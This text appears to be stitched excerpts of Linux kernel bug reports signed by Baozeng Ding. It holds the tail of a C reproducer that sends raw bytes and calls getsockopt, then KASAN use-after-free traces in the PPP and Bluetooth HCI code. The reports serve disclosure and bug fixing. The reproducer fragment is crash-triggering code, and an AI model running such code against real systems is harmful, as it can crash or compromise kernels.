c\x05\x6f\xf8\x16\x78\x0b\x41\xfa\x23\x96\xc0\x79\xf8\xb7\xf0\x2b\x60\x7e\x98\xe3\x7b\xab\x80\x1f\x0d\xbf\xf6\x7e\x37\x06\xf1\x11\x42\x38\x2a\x70\xdf\xa4\xca\xf5\xf3\xf4\x7d\xca\x10\x0c\xd5\xe2\x90\xa0\x15\xde\xc2\x61\xa2\x88\xea\x32\x37\x97\x83\xd0\x4c\xad\xe2\xae\x9b\x53\xa2\xc2\x54\x0c\xbd\xe1\x50\x3b\x15\xd4\xb1\xa9\x41\x6e\x18\x2e\x30\x3f\x91\x03\x81\x86\x8c\x5c\x1f\x76\x51\x92\xf5\xb5\xb2\xc3\x16\x01\xef\xe3\x9e\xb1\x92\x0e\x0e\xcb\x20\x7f\x10\x29\x08\x6e\x15\x3d\x1e\x7c\x70\xf5\xb5\x3c\x56\x15\x3c\x59\xe6\xe7\x9e\x16\xcd\xfc\x8e\xfa\x12\x99\xbb\x07\xaa\xd7\x1c\xd0\xae\x93\x4c\xba\x16\x5d\x0c\xed\x1d\x02\x87\xcd\x38\x31\xc6\x10\x42\xe1\x46\x4e\xa3\xae\xb6\xda\xb6\xb0\x49\x55\x89\x57\xe6\xac\xe3\xbf\xb5\x5c\x59\x93\x0d\x21\x35\xdd\x57\x8c\x04\x15\x91\x05\x69\x4a\xdb\x5e\xcb\x4d\xa3\x5d\xa8\x7e\x95\x9e\x9d\x95\x61\xc9\x1c\xdd\x66\x0a\x76\x18\xbb\x59\x6a\xa5\xc0\xf2\xb8\x2f\xa9\x4c\xa8\xb3\x2b\xa3\x8a\xbf\x5c\xe8\x18\x3d\x7f\x0e\x2f\xe9\x06\xf9\xb6\xcc\x60\xcc\x38\x6c\x9a\x78\xa7\x7c\x61", 1037); getsockopt(sock_dup, IPPROTO_IP, 0x81, (void *)0x2bf3ul, (socklen_t *)0x20003000ul); return 0; } Best Regards, Baozeng Ding
net/ppp: use-after-free in ppp_unregister_channel
kernel/kernel/task_work.c:115 [< inline >] exit_task_work kernel/include/linux/task_work.h:21 [] do_exit+0x8b5/0x2c60 kernel/kernel/exit.c:750 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? mm_update_next_owner+0x6f0/0x6f0 kernel/kernel/exit.c:357 [] ? __dequeue_signal+0x136/0x470 kernel/kernel/signal.c:550 [] ? recalc_sigpending_tsk+0x13b/0x180 kernel/kernel/signal.c:145 [] do_group_exit+0x108/0x330 kernel/kernel/exit.c:880 [] get_signal+0x5e4/0x14f0 kernel/kernel/signal.c:2307 [< inline >] ? kretprobe_table_lock kernel/kernel/kprobes.c:1113 [] ? kprobe_flush_task+0xb5/0x450 kernel/kernel/kprobes.c:1158 [] do_signal+0x83/0x1c90 kernel/arch/x86/kernel/signal.c:712 [] ? recycle_rp_inst+0x310/0x310 kernel/include/linux/list.h:655 [] ? setup_sigcontext+0x780/0x780 kernel/arch/x86/kernel/signal.c:165 [] ? finish_task_switch+0x424/0x5f0 kernel/kernel/sched/core.c:2692 [< inline >] ? finish_lock_switch kernel/kernel/sched/sched.h:1099 [] ? finish_task_switch+0x120/0x5f0 kernel/kernel/sched/core.c:2678 [< inline >] ? context_switch kernel/kernel/sched/core.c:2807 [] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283 [] exit_to_usermode_loop+0xf1/0x1a0 kernel/arch/x86/entry/common.c:247 [< inline >] prepare_exit_to_usermode kernel/arch/x86/entry/common.c:282 [] syscall_return_slowpath+0x19f/0x210 kernel/arch/x86/entry/common.c:344 [] int_ret_from_sys_call+0x25/0x9f kernel/arch/x86/entry/entry_64.S:281 Memory state around the buggy address: 880064e21680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880064e21700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >880064e21780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 880064e21800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880064e21880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
net/bluetooth: use-after-free in hci_event_packet
ernel/fs/read_write.c:530 [< none >] vfs_write+0x167/0x4a0 kernel/fs/read_write.c:577 [< inline >] SYSC_write kernel/fs/read_write.c:624 [< none >] SyS_write+0x111/0x220 kernel/fs/read_write.c:616 INFO: Slab 0xea0010fbdb00 objects=20 used=19 fp=0x88043ef6e310 flags=0x2fffc004080 INFO: Object 0x88043ef6e310 @offset=8976 fp=0x (null) CPU: 1 PID: 9348 Comm: kworker/u17:11 Tainted: GB 4.4.0+ #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 Workqueue: hci4 hci_rx_work 880433b8f6b0 8292049d 88048a004b40 88043ef6e310 88043ef6c000 880433b8f6e0 816f2054 88048a004b40 ea0010fbdb00 88043ef6e310 88043ef6e318 Call Trace: [< inline >] __dump_stack kernel/lib/dump_stack.c:15 [] dump_stack+0x6f/0xa2 kernel/lib/dump_stack.c:50 [] print_trailer+0xf4/0x150 kernel/mm/slub.c:654 [] object_err+0x2f/0x40 kernel/mm/slub.c:661 [< inline >] print_address_description kernel/mm/kasan/report.c:138 [] kasan_report_error+0x215/0x530 kernel/mm/kasan/report.c:236 [< inline >] kasan_report kernel/mm/kasan/report.c:259 [] __asan_report_load1_noabort+0x3e/0x40 kernel/mm/kasan/report.c:277 [< inline >] ? hci_inquiry_result_with_rssi_evt kernel/net/bluetooth/hci_event.c:3616 [] ? hci_event_packet+0x8d45/0x9f90 kernel/net/bluetooth/hci_event.c:5323 [< inline >] hci_inquiry_result_with_rssi_evt kernel/net/bluetooth/hci_event.c:3616 [] hci_event_packet+0x8d45/0x9f90 kernel/net/bluetooth/hci_event.c:5323 [< inline >] ? spin_lock kernel/include/linux/spinlock.h:302 [] ? deactivate_slab+0x212/0x710 kernel/mm/slub.c:1949 [< inline >] ? hci_cc_read_local_amp_info kernel/net/bluetooth/hci_event.c:833 [] ? hci_cmd_complete_evt+0xcfb0/0xcfb0 kernel/net/bluetooth/hci_event.c:2905 [< inline >] ? spin_unlock kernel/include/linux/spinlock.h:347 [] ? deactivate_slab+0x408/0x710 kernel/mm/slub.c:1995 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [< inline >] ? rcu_read_unlock kernel/include/linux/rcupdate.h:926 [] ? cpuacct_charge+0x1a7/0x380 kernel/kernel/sched/cpuacct.c:255 [< inline >] ? rcu_lock_release kernel/include/linux/rcupdate.h:495 [< inline >] ? rcu_read_unlock kernel/include/linux/rcupdate.h:930 [] ? cpuacct_charge+0x1c6/0x380 kernel/kernel/sched/cpuacct.c:255 [< inline >] ? task_cpu kernel/include/linux/sched.h:3111 [] ? cpuacct_charge+0x60/0x380 kernel/kernel/sched/cpuacct.c:240 [] ? rcu_read_unlock+0x16/0x70 kernel/include/linux/rcupdate.h:926 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? __compute_runnable_contrib+0x54/0x70 kernel/kernel/sched/fair.c:2549 [< inline >] ? __update_load_avg kernel/kernel/sched/fair.c:2668 [] ? update_cfs_rq_load_avg+0x513/0x1160 kernel/kernel/sched/fair.c:2795 [] ? skb_dequeue+0x22/0x180 kernel/net/core/skbuff.c:2333 [] ? trace_hardirqs_on+0xd/0x10 kernel/kernel/locking/lockdep.c:2619 [] ? hci_send_to_monitor+0x296/0x3e0 kernel/net/bluetooth/hci_sock.c:305 [] hci_rx_work+0x6f2/0xc00 kernel/net/bluetooth/hci_core.c:4157 [] ? process_one_work+0x6ca/0x1440 kernel/kernel/workqueue.c:2033 [] process_one_work+0x794/0x1440 kernel/kernel/workqueue.c:2036 [] ? process_one_work+0x6ca/0x1440 kernel/kernel/workqueue.c:2033 [] ? pwq_dec_nr_in_flight+0x2e0/0x2e0 kernel/include/linux/compiler.h:218 [] worker_thread+0xdb/0xfc0 kernel/kernel/workqueue.c:2170 [< inline >] ? context_switch kernel/kernel/sched/core.c:2807 [] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283 [] kthread+0x23f/0x2d0 kernel/drivers/block/aoe/aoecmd.c:1303 [] ? process_one_work+0x1440/0x1440 kernel/include/linux/list.h:655 [] ? kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 [] ? kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 [] ret_from_fork+0x3f/0x70 kernel/arch/x86/entry/entry_64.S:468 [] ? kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 Memory state around the buggy address: 88043ef6e200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88043ef6e280: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88043ef6e300: fc fc fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 88043ef6e380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88043ef6e400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb Best Regards, Baozeng Ding